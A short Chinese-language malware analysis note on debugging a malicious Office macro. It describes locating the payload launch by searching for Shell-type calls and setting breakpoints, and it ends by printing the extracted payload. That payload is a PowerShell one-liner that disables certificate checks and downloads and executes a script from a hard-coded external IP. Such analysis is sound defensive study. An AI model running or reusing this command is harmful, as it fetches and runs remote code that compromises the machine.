恶意宏学习备忘04——恶意宏调试记录
记录某次恶意宏分析
样本来源:https://mp.weixin.qq.com/s/xzO3pG45CNN-HGKDokI92A
可以用取巧的方式来进行宏调试,纯粹的宏能做到事情实际上是有限的,一般是对文档或 模板的操作。而宏病毒往往是作为payload的载体,通过创建其他例程,释放运行payload。无论宏病毒前面执行了 多么复杂的操作,最后肯定会运行payload,而运行payload的方式可能是Shell、WScript.Shell、Application.Run等 (以及前面提到的winmgmts方式),我们可以直接搜索这些字符串迅速定位到运行payload的地方。 在本例中,搜索“Shell”
直接鼠标左键断点下到shell语句,右键“添加监控”监视shell语句后的变量
(实际操作中通过oledump.py导出的宏代码编译不通过,把那些显示红色高亮的指令删除就可以了)
"powershell.exe -nop [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex (New-Object System.Net.WebClient) .DownloadString('https://23.227.194.58/'+(-join ((97..122) | Get-Random -Count 7 | % {[char]$_}))+'.png')"